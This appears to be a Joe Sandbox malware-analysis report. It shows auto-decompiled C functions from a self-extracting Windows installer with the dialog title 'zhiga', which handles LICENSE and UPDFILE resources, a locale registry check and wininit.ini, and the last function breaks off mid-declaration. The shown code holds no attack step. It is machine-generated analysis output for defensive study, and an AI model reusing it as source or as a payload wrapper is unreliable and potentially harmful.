                                                          • Instruction Fuzzy Hash: 5C115471F00209EFEB109FA5DC49ABFBBB8EB44B41F10016DFA45E7281EA7599048F91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                          				void* _t7;
                                                          				void* _t11;
                                                          				struct HWND__* _t12;
                                                          				int _t22;
                                                          				struct HWND__* _t24;
                                                          
                                                          				_t7 = _a8 - 0x10;
                                                          				if(_t7 == 0) {
                                                          					EndDialog(_a4, 2);
                                                          					L11:
                                                          					return 1;
                                                          				}
                                                          				_t11 = _t7 - 0x100;
                                                          				if(_t11 == 0) {
                                                          					_t12 = GetDesktopWindow();
                                                          					_t24 = _a4;
                                                          					E010C43D0(_t24, _t12);
                                                          					SetWindowTextA(_t24, "zhiga");
                                                          					SetDlgItemTextA(_t24, 0x838,  *0x10c9404);
                                                          					SetForegroundWindow(_t24);
                                                          					goto L11;
                                                          				}
                                                          				if(_t11 == 1) {
                                                          					_t22 = _a12;
                                                          					if(_t22 < 6) {
                                                          						goto L11;
                                                          					}
                                                          					if(_t22 <= 7) {
                                                          						L8:
                                                          						EndDialog(_a4, _t22);
                                                          						return 1;
                                                          					}
                                                          					if(_t22 != 0x839) {
                                                          						goto L11;
                                                          					}
                                                          					 *0x10c91dc = 1;
                                                          					goto L8;
                                                          				}
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • EndDialog.USER32(?,?), ref: 010C3490
                                                          • GetDesktopWindow.USER32 ref: 010C349A
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 010C34B2
                                                          • SetDlgItemTextA.USER32(?,00000838), ref: 010C34C4
                                                          • SetForegroundWindow.USER32(?), ref: 010C34CB
                                                          • EndDialog.USER32(?,00000002), ref: 010C34D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Window$DialogText$DesktopForegroundItem
                                                          • String ID: zhiga
                                                          • API String ID: 852535152-3705506974
                                                          • Opcode ID: 205fcb1049f21ba9717040d8438215a074bc8e990e6c549b64a81a301c587017
                                                          • Instruction ID: 9a3bb731f791ec2e33c3f57fc20ca0f50e04df17924fd6009d3cf5425e251f30
                                                          • Opcode Fuzzy Hash: 205fcb1049f21ba9717040d8438215a074bc8e990e6c549b64a81a301c587017
                                                          • Instruction Fuzzy Hash: ED019235360118EFD7265F69D80C96DBA65FB85B50B008018FEC68A584DE36A941CF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E010C2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t16;
                                                          				int _t21;
                                                          				char _t32;
                                                          				intOrPtr _t34;
                                                          				char* _t38;
                                                          				char _t42;
                                                          				char* _t44;
                                                          				CHAR* _t52;
                                                          				intOrPtr* _t55;
                                                          				CHAR* _t59;
                                                          				void* _t62;
                                                          				CHAR* _t64;
                                                          				CHAR* _t65;
                                                          				signed int _t66;
                                                          
                                                          				_t60 = __edx;
                                                          				_t16 =  *0x10c8004; // 0x4b13cf70
                                                          				_t17 = _t16 ^ _t66;
                                                          				_v8 = _t16 ^ _t66;
                                                          				_t65 = _a4;
                                                          				_t44 = __edx;
                                                          				_t64 = __ecx;
                                                          				if( *((char*)(__ecx)) != 0) {
                                                          					GetModuleFileNameA( *0x10c9a3c,  &_v268, 0x104);
                                                          					while(1) {
                                                          						_t17 =  *_t64;
                                                          						if(_t17 == 0) {
                                                          							break;
                                                          						}
                                                          						_t21 = IsDBCSLeadByte(_t17);
                                                          						 *_t65 =  *_t64;
                                                          						if(_t21 != 0) {
                                                          							_t65[1] = _t64[1];
                                                          						}
                                                          						if( *_t64 != 0x23) {
                                                          							L19:
                                                          							_t65 = CharNextA(_t65);
                                                          						} else {
                                                          							_t64 = CharNextA(_t64);
                                                          							if(CharUpperA( *_t64) != 0x44) {
                                                          								if(CharUpperA( *_t64) != 0x45) {
                                                          									if( *_t64 == 0x23) {
                                                          										goto L19;
                                                          									}
                                                          								} else {
                                                          									E010C1680(_t65, E010C17C8(_t44, _t65),  &_v268);
                                                          									_t52 = _t65;
                                                          									_t14 =  &(_t52[1]); // 0x2
                                                          									_t60 = _t14;
                                                          									do {
                                                          										_t32 =  *_t52;
                                                          										_t52 =  &(_t52[1]);
                                                          									} while (_t32 != 0);
                                                          									goto L17;
                                                          								}
                                                          							} else {
                                                          								E010C65E8( &_v268);
                                                          								_t55 =  &_v268;
                                                          								_t62 = _t55 + 1;
                                                          								do {
                                                          									_t34 =  *_t55;
                                                          									_t55 = _t55 + 1;
                                                          								} while (_t34 != 0);
                                                          								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                          								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                          									 *_t38 = 0;
                                                          								}
                                                          								E010C1680(_t65, E010C17C8(_t44, _t65),  &_v268);
                                                          								_t59 = _t65;
                                                          								_t12 =  &(_t59[1]); // 0x2
                                                          								_t60 = _t12;
                                                          								do {
                                                          									_t42 =  *_t59;
                                                          									_t59 =  &(_t59[1]);
                                                          								} while (_t42 != 0);
                                                          								L17:
                                                          								_t65 =  &(_t65[_t52 - _t60]);
                                                          							}
                                                          						}
                                                          						_t64 = CharNextA(_t64);
                                                          					}
                                                          					 *_t65 = _t17;
                                                          				}
                                                          				return E010C6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                          			}

                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 010C2AE6
                                                          • IsDBCSLeadByte.KERNEL32(00000000), ref: 010C2AF2
                                                          • CharNextA.USER32(?), ref: 010C2B12
                                                          • CharUpperA.USER32 ref: 010C2B1E
                                                          • CharPrevA.USER32(?,?), ref: 010C2B55
                                                          • CharNextA.USER32(?), ref: 010C2BD4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                          • String ID:
                                                          • API String ID: 571164536-0
                                                          • Opcode ID: 58b561c74bb137219a7bc5deac4f925dffe5e6873d6e3b9811b74bc5c0406088
                                                          • Instruction ID: 07fa600ebdfaf76df3260182067001853f4d15c321452361df46461ffefe34ff
                                                          • Opcode Fuzzy Hash: 58b561c74bb137219a7bc5deac4f925dffe5e6873d6e3b9811b74bc5c0406088
                                                          • Instruction Fuzzy Hash: F3412A346042499FDB669F38C854AFE7FA99F96740F1400DEDCC283646DB3A8A46CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E010C43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                          				signed int _v8;
                                                          				struct tagRECT _v24;
                                                          				struct tagRECT _v40;
                                                          				struct HWND__* _v44;
                                                          				intOrPtr _v48;
                                                          				int _v52;
                                                          				intOrPtr _v56;
                                                          				int _v60;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t29;
                                                          				void* _t53;
                                                          				intOrPtr _t56;
                                                          				int _t59;
                                                          				struct HWND__* _t63;
                                                          				struct HWND__* _t67;
                                                          				struct HWND__* _t68;
                                                          				struct HDC__* _t69;
                                                          				int _t72;
                                                          				signed int _t74;
                                                          
                                                          				_t63 = __edx;
                                                          				_t29 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t29 ^ _t74;
                                                          				_t68 = __edx;
                                                          				_v44 = __ecx;
                                                          				GetWindowRect(__ecx,  &_v40);
                                                          				_t53 = _v40.bottom - _v40.top;
                                                          				_v48 = _v40.right - _v40.left;
                                                          				GetWindowRect(_t68,  &_v24);
                                                          				_v56 = _v24.bottom - _v24.top;
                                                          				_t69 = GetDC(_v44);
                                                          				_v52 = GetDeviceCaps(_t69, 8);
                                                          				_v60 = GetDeviceCaps(_t69, 0xa);
                                                          				ReleaseDC(_v44, _t69);
                                                          				_t56 = _v48;
                                                          				asm("cdq");
                                                          				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                          				_t67 = 0;
                                                          				if(_t72 >= 0) {
                                                          					_t63 = _v52;
                                                          					if(_t72 + _t56 > _t63) {
                                                          						_t72 = _t63 - _t56;
                                                          					}
                                                          				} else {
                                                          					_t72 = _t67;
                                                          				}
                                                          				asm("cdq");
                                                          				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                          				if(_t59 >= 0) {
                                                          					_t63 = _v60;
                                                          					if(_t59 + _t53 > _t63) {
                                                          						_t59 = _t63 - _t53;
                                                          					}
                                                          				} else {
                                                          					_t59 = _t67;
                                                          				}
                                                          				return E010C6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                          			}

























                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 010C43F1
                                                          • GetWindowRect.USER32(00000000,?), ref: 010C440B
                                                          • GetDC.USER32(?), ref: 010C4423
                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 010C442E
                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 010C443A
                                                          • ReleaseDC.USER32(?,00000000), ref: 010C4447
                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010C44A2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Window$CapsDeviceRect$Release
                                                          • String ID:
                                                          • API String ID: 2212493051-0
                                                          • Opcode ID: 740fd3f967d1c0983a678ba23deb929a250b25ccac46eb81ada3a7d455e4f733
                                                          • Instruction ID: bb5363fe2ddf68e066c501eca35ce0362edaaf65007b9e319d507c560fb85e2e
                                                          • Opcode Fuzzy Hash: 740fd3f967d1c0983a678ba23deb929a250b25ccac46eb81ada3a7d455e4f733
                                                          • Instruction Fuzzy Hash: 0B311C72E00119AFCB14CFB8D9889EEBBB5FB89310F254169F845F3244EA356D058F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E010C6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                          				signed int _v8;
                                                          				char _v28;
                                                          				intOrPtr _v32;
                                                          				struct HINSTANCE__* _v36;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t16;
                                                          				struct HRSRC__* _t21;
                                                          				intOrPtr _t26;
                                                          				void* _t30;
                                                          				struct HINSTANCE__* _t36;
                                                          				intOrPtr* _t40;
                                                          				void* _t41;
                                                          				intOrPtr* _t44;
                                                          				intOrPtr* _t45;
                                                          				void* _t47;
                                                          				signed int _t50;
                                                          				struct HINSTANCE__* _t51;
                                                          
                                                          				_t44 = __edx;
                                                          				_t16 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t16 ^ _t50;
                                                          				_t46 = 0;
                                                          				_v32 = __ecx;
                                                          				_v36 = 0;
                                                          				_t36 = 1;
                                                          				E010C171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                          				while(1) {
                                                          					_t51 = _t51 + 0x10;
                                                          					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                          					if(_t21 == 0) {
                                                          						break;
                                                          					}
                                                          					_t45 = LockResource(LoadResource(_t46, _t21));
                                                          					if(_t45 == 0) {
                                                          						 *0x10c9124 = 0x80070714;
                                                          						_t36 = _t46;
                                                          					} else {
                                                          						_t5 = _t45 + 8; // 0x8
                                                          						_t44 = _t5;
                                                          						_t40 = _t44;
                                                          						_t6 = _t40 + 1; // 0x9
                                                          						_t47 = _t6;
                                                          						do {
                                                          							_t26 =  *_t40;
                                                          							_t40 = _t40 + 1;
                                                          						} while (_t26 != 0);
                                                          						_t41 = _t40 - _t47;
                                                          						_t46 = _t51;
                                                          						_t7 = _t41 + 1; // 0xa
                                                          						 *0x10ca288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                          						_t30 = _v32();
                                                          						if(_t51 != _t51) {
                                                          							asm("int 0x29");
                                                          						}
                                                          						_push(_t45);
                                                          						if(_t30 == 0) {
                                                          							_t36 = 0;
                                                          							FreeResource(??);
                                                          						} else {
                                                          							FreeResource();
                                                          							_v36 = _v36 + 1;
                                                          							E010C171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                          							_t46 = 0;
                                                          							continue;
                                                          						}
                                                          					}
                                                          					L12:
                                                          					return E010C6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                          				}
                                                          				goto L12;
                                                          			}























                                                          APIs
                                                            • Part of subcall function 010C171E: _vsnprintf.MSVCRT ref: 010C1750
                                                          • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010C51CA,00000004,00000024,010C2F71,?,00000002,00000000), ref: 010C62CD
                                                          • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010C51CA,00000004,00000024,010C2F71,?,00000002,00000000), ref: 010C62D4
                                                          • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010C51CA,00000004,00000024,010C2F71,?,00000002,00000000), ref: 010C631B
                                                          • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 010C6345
                                                          • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010C51CA,00000004,00000024,010C2F71,?,00000002,00000000), ref: 010C6357
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                          • String ID: UPDFILE%lu
                                                          • API String ID: 2922116661-2329316264
                                                          • Opcode ID: 4093f76cc5c386d89aa2f5a6100dd76341c30a4e82cf5f1567eb7ac5e8b2690d
                                                          • Instruction ID: e57cce3576bb40d0073e019d2545f8fe6f25ea2aea9a0e88d7b08c6f4d94dcc1
                                                          • Opcode Fuzzy Hash: 4093f76cc5c386d89aa2f5a6100dd76341c30a4e82cf5f1567eb7ac5e8b2690d
                                                          • Instruction Fuzzy Hash: B921B675A00219EFDB209FA5DC459FE7B78FB44B54B10415DFA82A3241D73B99028FE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010C681F(void* __ebx) {
                                                          				signed int _v8;
                                                          				char _v20;
                                                          				struct _OSVERSIONINFOA _v168;
                                                          				void* _v172;
                                                          				int* _v176;
                                                          				int _v180;
                                                          				int _v184;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t19;
                                                          				long _t31;
                                                          				signed int _t35;
                                                          				void* _t36;
                                                          				intOrPtr _t41;
                                                          				signed int _t44;
                                                          
                                                          				_t36 = __ebx;
                                                          				_t19 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t19 ^ _t44;
                                                          				_t41 =  *0x10c81d8; // 0xfffffffe
                                                          				_t43 = 0;
                                                          				_v180 = 0xc;
                                                          				_v176 = 0;
                                                          				if(_t41 == 0xfffffffe) {
                                                          					 *0x10c81d8 = 0;
                                                          					_v168.dwOSVersionInfoSize = 0x94;
                                                          					if(GetVersionExA( &_v168) == 0) {
                                                          						L12:
                                                          						_t41 =  *0x10c81d8; // 0xfffffffe
                                                          					} else {
                                                          						_t41 = 1;
                                                          						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                          							goto L12;
                                                          						} else {
                                                          							_t31 = RegQueryValueExA(_v172, 0x10c1140, 0,  &_v184,  &_v20,  &_v180);
                                                          							_t43 = _t31;
                                                          							RegCloseKey(_v172);
                                                          							if(_t31 != 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t40 =  &_v176;
                                                          								if(E010C66F9( &_v20,  &_v176) == 0) {
                                                          									goto L12;
                                                          								} else {
                                                          									_t35 = _v176 & 0x000003ff;
                                                          									if(_t35 == 1 || _t35 == 0xd) {
                                                          										 *0x10c81d8 = _t41;
                                                          									} else {
                                                          										goto L12;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return E010C6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                          			}



















                                                          APIs
                                                          • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010C686E
                                                          • GetSystemMetrics.USER32(0000004A), ref: 010C68A7
                                                          • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010C68CC
                                                          • RegQueryValueExA.ADVAPI32(?,010C1140,00000000,?,?,0000000C), ref: 010C68F4
                                                          • RegCloseKey.ADVAPI32(?), ref: 010C6902
                                                            • Part of subcall function 010C66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,010C691A), ref: 010C6741
                                                          Strings
                                                          • Control Panel\Desktop\ResourceLocale, xrefs: 010C68C2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                          • String ID: Control Panel\Desktop\ResourceLocale
                                                          • API String ID: 3346862599-1109908249
                                                          • Opcode ID: bd4217b0402cdd8e70bf046901f19e82a1f5b6bcb2edac0beeb8aeb34d1982cb
                                                          • Instruction ID: 1426a188557a9ed8a7ac9c095328a539ac3c043fc2c98e2f44b709d39e859759
                                                          • Opcode Fuzzy Hash: bd4217b0402cdd8e70bf046901f19e82a1f5b6bcb2edac0beeb8aeb34d1982cb
                                                          • Instruction Fuzzy Hash: 89318231A00228DFDB318B15CC44BEEB7BCEB45B54F0041EAE989A6341D73699858F51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C3A3F(void* __eflags) {
                                                          				void* _t3;
                                                          				void* _t9;
                                                          				CHAR* _t16;
                                                          
                                                          				_t16 = "LICENSE";
                                                          				_t1 = E010C468F(_t16, 0, 0) + 1; // 0x1
                                                          				_t3 = LocalAlloc(0x40, _t1);
                                                          				 *0x10c8d4c = _t3;
                                                          				if(_t3 != 0) {
                                                          					_t19 = _t16;
                                                          					if(E010C468F(_t16, _t3, _t28) != 0) {
                                                          						if(lstrcmpA( *0x10c8d4c, "<None>") == 0) {
                                                          							LocalFree( *0x10c8d4c);
                                                          							L9:
                                                          							 *0x10c9124 = 0;
                                                          							return 1;
                                                          						}
                                                          						_t9 = E010C6517(_t19, 0x7d1, 0, E010C3100, 0, 0);
                                                          						LocalFree( *0x10c8d4c);
                                                          						if(_t9 != 0) {
                                                          							goto L9;
                                                          						}
                                                          						 *0x10c9124 = 0x800704c7;
                                                          						L2:
                                                          						return 0;
                                                          					}
                                                          					E010C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          					LocalFree( *0x10c8d4c);
                                                          					 *0x10c9124 = 0x80070714;
                                                          					goto L2;
                                                          				}
                                                          				E010C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          				 *0x10c9124 = E010C6285();
                                                          				goto L2;
                                                          			}







                                                          APIs
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010C2F64,?,00000002,00000000), ref: 010C3A5D
                                                          • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 010C3AB3
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                            • Part of subcall function 010C6285: GetLastError.KERNEL32(010C5BBC), ref: 010C6285
                                                          • lstrcmpA.KERNEL32(<None>,00000000), ref: 010C3AD0
                                                          • LocalFree.KERNEL32 ref: 010C3B13
                                                            • Part of subcall function 010C6517: FindResourceA.KERNEL32(010C0000,000007D6,00000005), ref: 010C652A
                                                            • Part of subcall function 010C6517: LoadResource.KERNEL32(010C0000,00000000,?,?,010C2EE8,00000000,010C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010C6538
                                                            • Part of subcall function 010C6517: DialogBoxIndirectParamA.USER32(010C0000,00000000,00000547,010C19E0,00000000), ref: 010C6557
                                                            • Part of subcall function 010C6517: FreeResource.KERNEL32(00000000,?,?,010C2EE8,00000000,010C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010C6560
                                                          • LocalFree.KERNEL32(00000000,010C3100,00000000,00000000), ref: 010C3AF4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                          • String ID: <None>$LICENSE
                                                          • API String ID: 2414642746-383193767
                                                          • Opcode ID: 004ca60bf6b04d7a55db27443f0cc3cdecbe0b218bade3c7cceddef2f5f7ae71
                                                          • Instruction ID: 6c64cde41e506e66da79611038c06601881978dc23e3a1dc190460975148b203
                                                          • Opcode Fuzzy Hash: 004ca60bf6b04d7a55db27443f0cc3cdecbe0b218bade3c7cceddef2f5f7ae71
                                                          • Instruction Fuzzy Hash: 3D11A571700201AFD7346B26AC09E5F7AA9FBD5F40B10802EB9C1DA184DA7F88108F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010C24E0(void* __ebx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t7;
                                                          				void* _t20;
                                                          				long _t26;
                                                          				signed int _t27;
                                                          
                                                          				_t20 = __ebx;
                                                          				_t7 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t7 ^ _t27;
                                                          				_t25 = 0x104;
                                                          				_t26 = 0;
                                                          				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                          					E010C658A( &_v268, 0x104, "wininit.ini");
                                                          					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                          					_t25 = _lopen( &_v268, 0x40);
                                                          					if(_t25 != 0xffffffff) {
                                                          						_t26 = _llseek(_t25, 0, 2);
                                                          						_lclose(_t25);
                                                          					}
                                                          				}
                                                          				return E010C6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                          			}












                                                          APIs
                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 010C2506
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 010C252C
                                                          • _lopen.KERNEL32(?,00000040), ref: 010C253B
                                                          • _llseek.KERNEL32(00000000,00000000,00000002), ref: 010C254C
                                                          • _lclose.KERNEL32(00000000), ref: 010C2555
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                          • String ID: wininit.ini
                                                          • API String ID: 3273605193-4206010578
                                                          • Opcode ID: a6f7dd1c555538400af253b0db41396ff6613888a1520230ccc2f9a1ead0a835
                                                          • Instruction ID: dd104f049b36e37ecf9be7871733e683553f692811dc605e673ec512e80e16e9
                                                          • Opcode Fuzzy Hash: a6f7dd1c555538400af253b0db41396ff6613888a1520230ccc2f9a1ead0a835
                                                          • Instruction Fuzzy Hash: A701B931B00118ABD7309B659C0CEDF7B7CDB55750F100159FA85D3184DA798A41CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E010C36EE(CHAR* __ecx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				struct _OSVERSIONINFOA _v416;
                                                          				signed int _v420;
                                                          				signed int _v424;
                                                          				CHAR* _v428;
                                                          				CHAR* _v432;
                                                          				signed int _v436;
                                                          				CHAR* _v440;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t72;
                                                          				CHAR* _t77;
                                                          				CHAR* _t91;
                                                          				CHAR* _t94;
                                                          				int _t97;
                                                          				CHAR* _t98;
                                                          				signed char _t99;
                                                          				CHAR* _t104;
                                                          				signed short _t107;
                                                          				signed int _t109;
                                                          				short _t113;
                                                          				void* _t114;
                                                          				signed char _t115;
                                                          				short _t119;
                                                          				CHAR* _t123;
